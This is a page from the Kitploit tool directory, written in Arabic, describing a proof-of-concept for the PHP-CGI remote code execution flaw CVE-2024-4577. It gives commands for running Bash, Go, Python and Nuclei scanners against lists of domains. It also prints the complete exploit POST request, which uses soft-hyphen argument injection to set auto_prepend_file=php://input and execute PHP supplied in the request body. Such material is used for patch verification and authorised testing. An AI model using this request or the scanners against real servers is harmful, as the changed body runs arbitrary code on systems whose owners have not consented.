Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-4577-PHP-RCE — إثبات مفهوم (PoC) لثغرة RCE في PHP (CVE-2024-4577) مكتوب بلغة bash و go و python وقالب nuclei. | Kitploit
أدوات/GitHubGitHub/zephrfish/cve-2024-4577-php-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubzephrfish/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

إثبات مفهوم (PoC) لثغرة RCE في PHP (CVE-2024-4577) مكتوب بلغة bash و go و python وقالب nuclei.

عرض المستودع
33136منذ 2 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم (PoC) لـ PHP RCE

CVE-2024-4577: حقن الوسائط في PHP-CGI

نظرة عامة

يحتوي هذا المستودع على نصوص برمجية للتحقق من ثغرة CVE-2024-4577، وهي مشكلة حقن الوسائط في PHP-CGI. يمكنك استخدام نصوص Bash وGo وPython المقدمة لاختبار قائمة من النطاقات لهذه الثغرة. لقد أصدرت أيضًا ملف YAML لـ Nuclei.

الاستخدام

نص Bash

لاستخدام نص Bash، قم بتشغيل الأمر التالي:

./CVE-2024-4577.sh /path/to/domains-list

نص Go

أولاً، احفظ نص Go في ملف باسم CVE-2024-4577.go. لبناء وتشغيل نص Go:

  1. قم بتجميع نص Go إلى ملف ثنائي:

    go build -o CVE-2024-4577 CVE-2024-4577.go
    
  2. قم بتشغيل الملف الثنائي مع ملف قائمة النطاقات كوسيطة:

    ./CVE-2024-4577 /path/to/domains-list
    

نص Python

أولاً، احفظ نص Python في ملف باسم CVE-2024-4577.py. لتشغيل نص Python:

  1. تأكد من تثبيت مكتبة requests:

    pip install requests
    
  2. قم بتشغيل نص Python مع ملف قائمة النطاقات كوسيطة:

    python CVE-2024-4577.py /path/to/domains-list
    
  3. (اختياري) إذا كنت تريد طباعة المضيفين الثغرات فقط:

    python CVE-2024-4577.py /path/to/domains-list --quiet
    

شرح إثبات المفهوم (POC)

لاختبار الثغرة يدويًا، يمكنك إرسال طلب POST التالي:

POST /test.hello?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php phpinfo(); ?>

قالب Nuclei

لقد قمت أيضًا بإنشاء قالب Nuclei لفحص المثيلات الثغرات، ويستخدم مخطط التخطيط v3 وقد تم اختباره في بيئة مختبرية:

nuclei -t CVE-2024-4577.yaml -u <target-url>

مثال على قائمة النطاقات

يجب أن تكون قائمة النطاقات مسبوقة بـ http/https لضمان قراءتها بشكل صحيح.

http://example.com
http://testsite.com
http://vulnerablesite.com

مثال على الإخراج

إذا تم العثور على نطاق معرض للثغرة، سيكون الإخراج:

http://example.com: Vulnerable
http://vulnerablesite.com: Vulnerable
تنزيل الأداة